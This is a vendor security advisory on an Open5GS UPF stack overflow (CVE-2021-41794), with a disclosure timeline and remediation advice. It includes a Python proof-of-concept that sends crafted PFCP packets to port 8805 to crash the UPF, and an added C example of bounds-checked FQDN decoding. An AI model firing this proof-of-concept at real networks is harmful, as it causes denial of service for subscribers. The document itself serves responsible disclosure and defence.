Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)

October 6, 2021 - nccgroup

Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

Connecting to the UPF's PFCP port (8805) and sending an Association Setup Request followed by a Session Establishment Request whose PDI Network Instance is set to 'internet' causes stack corruption on the UPF.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files: lib/core/ogs-3gpp-types.c

The following python script can be used to replicate the issue:

#!/usr/bin/env python3

import socket

# UDP socket towards the UPF's PFCP port; a short timeout so a missing
# response (e.g. after the UPF crashes) does not block the script.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

# PFCP Association Setup Request (message type 5): Node ID (IPv4),
# Recovery Time Stamp and CP Function Features IEs.
pfcp_association_setup_req = b'\x20\x05\x00\x1a\x00\x00\x01\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x60\x00\x04\x5f\xf4\x38\x25\x00\x59\x00\x01\x00'

# PFCP Session Establishment Request with the PDI Network Instance set to
# 'internet' (payload bytes not reproduced on this page).
pfcp_session_establishment_req = b'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'

sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
    sock.recv(65535)
except Exception as ex:
    print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
    sock.recv(65535)
except Exception as ex:
    print(f"Receive failed: {ex}")

sock.close()

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.
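The fix described above amounts to checking the length before the copy. The following C function is an added illustration, not Open5GS's ogs_fqdn_parse or its patch: it assumes the 3GPP label-length encoding (a length octet followed by that many label characters, repeated) in which a PDI Network Instance such as 'internet' is carried, and rejects any length octet that would read past the input or write past the output buffer. The function names and sample inputs are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bounds-checked decoder for a label-length encoded FQDN / network instance
 * (<len><label><len><label>...). Hypothetical hardened pattern, not
 * Open5GS's ogs_fqdn_parse. Returns the dotted-name length written to dst
 * (NUL-terminated), or -1 if any label length would read past src or write
 * past dst: the unchecked memcpy length the advisory describes. */
int fqdn_decode_safe(char *dst, size_t dst_size,
                     const uint8_t *src, size_t src_len)
{
    size_t in = 0, out = 0;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    while (in < src_len) {
        size_t label_len = src[in++];            /* untrusted length octet */
        if (label_len == 0 || label_len > src_len - in)
            return -1;                           /* empty label or overruns src */
        if (out > 0) {                           /* '.' between labels */
            if (dst_size - out < 1)
                return -1;
            dst[out++] = '.';
        }
        if (label_len + 1 > dst_size - out)      /* label plus final NUL */
            return -1;                           /* would overflow dst */
        memcpy(dst + out, src + in, label_len);  /* provably in bounds now */
        in  += label_len;
        out += label_len;
    }
    if (out == 0)
        return -1;                               /* no labels at all */
    dst[out] = '\0';
    return (int)out;
}

/* Constructed samples: a well-formed two-label name, and one whose length
 * octet (0x20 = 32) claims more bytes than the message actually carries. */
const uint8_t SAMPLE_OK[]       = { 8,'i','n','t','e','r','n','e','t', 4,'t','e','s','t' };
const uint8_t SAMPLE_OVERSIZE[] = { 0x20,'i','n','t','e','r','n','e','t' };

char decoded[64];  /* receives the output of the last decode_result() call */
int decode_result(const uint8_t *src, size_t src_len, size_t dst_size)
{
    if (dst_size > sizeof decoded) return -2;
    memset(decoded, 0, sizeof decoded);
    return fqdn_decode_safe(decoded, dst_size, src, src_len);
}
```

Passing a deliberately small dst_size shows the second check rejecting a name that fits the input but not the destination, which is the direction the stack overflow took.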

Vendor Communication

29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman
